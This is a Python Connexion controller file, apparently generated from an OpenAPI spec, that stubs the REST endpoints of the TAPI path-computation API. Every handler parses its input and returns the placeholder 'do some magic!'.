] | 143 | 2016-06-08T04:09:54.000Z | 2018-02-23T10:45:59.000Z | RI/flask_server/tapi_server/controllers/tapi_path_computation_controller.py | arthurMll/TAPI | e1171bb139c6791a953af09cfc2bc7ad928da73d | [
"Apache-2.0"
] | 64 | 2018-03-07T07:55:17.000Z | 2022-03-28T07:14:28.000Z | import connexion
import six
from tapi_server.models.inline_object import InlineObject # noqa: E501
from tapi_server.models.inline_object11 import InlineObject11 # noqa: E501
from tapi_server.models.inline_object26 import InlineObject26 # noqa: E501
from tapi_server.models.tapi_common_bandwidth_profile import TapiCommonBandwidthProfile # noqa: E501
from tapi_server.models.tapi_common_capacity import TapiCommonCapacity # noqa: E501
from tapi_server.models.tapi_common_capacity_value import TapiCommonCapacityValue # noqa: E501
from tapi_server.models.tapi_common_name_and_value import TapiCommonNameAndValue # noqa: E501
from tapi_server.models.tapi_common_service_interface_point_ref import TapiCommonServiceInterfacePointRef # noqa: E501
from tapi_server.models.tapi_path_computation_compute_p2_p_path import TapiPathComputationComputeP2PPath # noqa: E501
from tapi_server.models.tapi_path_computation_delete_p2_p_path import TapiPathComputationDeleteP2PPath # noqa: E501
from tapi_server.models.tapi_path_computation_optimize_p2_p_path import TapiPathComputationOptimizeP2PPath # noqa: E501
from tapi_server.models.tapi_path_computation_path import TapiPathComputationPath # noqa: E501
from tapi_server.models.tapi_path_computation_path_computation_context import TapiPathComputationPathComputationContext # noqa: E501
from tapi_server.models.tapi_path_computation_path_computation_service import TapiPathComputationPathComputationService # noqa: E501
from tapi_server.models.tapi_path_computation_path_objective_function import TapiPathComputationPathObjectiveFunction # noqa: E501
from tapi_server.models.tapi_path_computation_path_optimization_constraint import TapiPathComputationPathOptimizationConstraint # noqa: E501
from tapi_server.models.tapi_path_computation_path_ref import TapiPathComputationPathRef # noqa: E501
from tapi_server.models.tapi_path_computation_path_service_end_point import TapiPathComputationPathServiceEndPoint # noqa: E501
from tapi_server.models.tapi_path_computation_routing_constraint import TapiPathComputationRoutingConstraint # noqa: E501
from tapi_server.models.tapi_path_computation_topology_constraint import TapiPathComputationTopologyConstraint # noqa: E501
from tapi_server.models.tapi_topology_cost_characteristic import TapiTopologyCostCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_latency_characteristic import TapiTopologyLatencyCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_link_ref import TapiTopologyLinkRef # noqa: E501
from tapi_server.models.tapi_topology_node_ref import TapiTopologyNodeRef # noqa: E501
from tapi_server.models.tapi_topology_risk_characteristic import TapiTopologyRiskCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_topology_ref import TapiTopologyTopologyRef # noqa: E501
from tapi_server import util
def data_context_path_computation_context_delete(): # noqa: E501
"""data_context_path_computation_context_delete
removes tapi.path.computation.PathComputationContext # noqa: E501
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_get(): # noqa: E501
"""data_context_path_computation_context_get
returns tapi.path.computation.PathComputationContext # noqa: E501
:rtype: TapiPathComputationPathComputationContext
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_service_post(tapi_path_computation_path_computation_service=None): # noqa: E501
"""data_context_path_computation_context_path_comp_service_post
creates tapi.path.computation.PathComputationService # noqa: E501
:param tapi_path_computation_path_computation_service: tapi.path.computation.PathComputationService to be added to list
:type tapi_path_computation_path_computation_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_computation_service = TapiPathComputationPathComputationService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_delete
removes tapi.path.computation.PathComputationService # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_point_post(uuid, tapi_path_computation_path_service_end_point=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_point_post
creates tapi.path.computation.PathServiceEndPoint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_service_end_point: tapi.path.computation.PathServiceEndPoint to be added to list
:type tapi_path_computation_path_service_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_service_end_point = TapiPathComputationPathServiceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete
removes tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get
returns tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonBandwidthProfile
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post(uuid, local_id, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post
creates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added to list
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put(uuid, local_id, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put
creates or updates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added or updated
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_delete
removes tapi.common.Capacity # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_get
returns tapi.common.Capacity # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacity
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_post(uuid, local_id, tapi_common_capacity=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_post
creates tapi.common.Capacity # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity: tapi.common.Capacity to be added to list
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_put(uuid, local_id, tapi_common_capacity=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_put
creates or updates tapi.common.Capacity # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity: tapi.common.Capacity to be added or updated
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_delete(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_delete
removes tapi.path.computation.PathServiceEndPoint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_get
returns tapi.path.computation.PathServiceEndPoint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiPathComputationPathServiceEndPoint
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_name_post(uuid, local_id, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_delete(uuid, local_id, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_get(uuid, local_id, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_post(uuid, local_id, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_put(uuid, local_id, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_post(uuid, local_id, tapi_path_computation_path_service_end_point=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_post
creates tapi.path.computation.PathServiceEndPoint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_path_computation_path_service_end_point: tapi.path.computation.PathServiceEndPoint to be added to list
:type tapi_path_computation_path_service_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_service_end_point = TapiPathComputationPathServiceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_put(uuid, local_id, tapi_path_computation_path_service_end_point=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_put
creates or updates tapi.path.computation.PathServiceEndPoint # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_path_computation_path_service_end_point: tapi.path.computation.PathServiceEndPoint to be added or updated
:type tapi_path_computation_path_service_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_service_end_point = TapiPathComputationPathServiceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_service_interface_point_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_service_interface_point_get
returns tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonServiceInterfacePointRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_get
returns tapi.path.computation.PathComputationService # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationPathComputationService
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_delete
removes tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_get
returns tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationPathObjectiveFunction
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
